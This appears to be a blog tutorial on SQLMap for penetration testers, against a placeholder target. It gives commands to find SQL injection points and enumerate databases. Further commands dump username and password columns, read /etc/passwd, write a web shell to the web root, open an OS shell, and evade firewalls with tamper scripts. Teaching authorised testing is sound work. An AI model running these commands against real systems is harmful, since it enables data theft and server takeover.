SQLMap for Pentesters: Automating SQL Injection Like a Pro
SQL injection is one of the oldest — and still one of the most devastating — vulnerabilities in web applications. And when it comes to automating SQLi attacks, SQLMap is king.
This post breaks down what SQLMap does, how it works, and how to wield it efficiently during real-world penetration tests. No fluff. Just pure, targeted exploitation.
What Is SQLMap?
SQLMap is an open-source tool that automates the process of detecting and exploiting SQL injection flaws. It can:
- Identify injection points
- Enumerate databases, tables, and columns
- Extract data
- Read and write files on the host
- Gain command execution or even a shell (if misconfigurations allow it)
It supports multiple DBMSs: MySQL, MSSQL, Oracle, PostgreSQL, and more.
Installing SQLMap
On Kali Linux:
sudo apt install sqlmap
Or clone it:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
Run it with:
python3 sqlmap.py
Basic Usage
Test a GET parameter:
sqlmap -u "http://target.com/page.php?id=1"
# -u: target URL with a parameter
Test a POST request:
sqlmap -u http://target.com/login.php --data "username=admin&password=admin"
# --data: POST data to inject
Enumerating the Database
After confirming injection:
sqlmap -u "http://target.com/page.php?id=1" --dbs
# Lists all databases
Choose a DB and list tables:
sqlmap -u "http://target.com/page.php?id=1" -D users_db --tables
# -D: target database
List columns in a table:
sqlmap -u "http://target.com/page.php?id=1" -D users_db -T users --columns
# -T: target table
Dump data from columns:
sqlmap -u "http://target.com/page.php?id=1" -D users_db -T users -C username,password --dump
# -C: columns to dump
Using Cookies and Headers
Inject into a session cookie:
sqlmap -u http://target.com --cookie "PHPSESSID=abc123"
Custom headers (e.g. auth token):
sqlmap -u http://target.com/page.php?id=1 -H "Authorization: Bearer TOKEN"
Reading and Writing Files (If Vulnerable)
Read /etc/passwd on the DB host:
sqlmap -u "http://target.com/page.php?id=1" --file-read="/etc/passwd"
Write a file (web shell example):
sqlmap -u "http://target.com/page.php?id=1" --file-write=./shell.php --file-dest="/var/www/html/shell.php"
OS Command Execution
If SQLMap detects the ability to execute commands:
sqlmap -u "http://target.com/page.php?id=1" --os-shell
This can sometimes give you an interactive shell on the system.
Bypasses and Tamper Scripts
SQLMap includes tamper scripts to bypass WAFs and filters:
sqlmap -u "http://target.com/page.php?id=1" --tamper=space2comment
# You can chain tamper scripts with commas
Check available scripts:
ls /usr/share/sqlmap/tamper/
Saving and Reusing Sessions
To avoid re-running time-consuming scans:
sqlmap -u "http://target.com/page.php?id=1" --dump --session=target_session
Later, resume:
sqlmap --session=target_session
Using SQLMap with Burp Suite
Save your Burp request to a file (right-click → “Copy to file”) and use:
sqlmap -r request.txt
# -r: use a raw request file
This is useful for testing complex headers or parameters not shown in the URL.
Tips and Best Practices
- Always verify the injection manually before running a full dump
- Use
--leveland--riskto control depth:sqlmap -u "http://target.com/page.php?id=1" --level=5 --risk=3 - Use
--techniqueto test specific payload types (B: boolean, U: union, E: error-based, etc.) - Be surgical: don’t dump entire DBs unless scoped. Be specific with
-D,-T,-C
Final Thoughts
SQLMap is powerful — but like all tools, it’s only as good as the hands wielding it. Understand the logic behind what it’s doing: union-based vs. error-based injection, time delays vs. blind, and so on.
Learn to recognize when not to use it. SQLMap is loud and will trigger alarms in production environments. In stealthy tests, manual SQLi or custom payloads might be better.
But when the gloves are off and it’s time to extract everything a vulnerable app can offer — SQLMap delivers.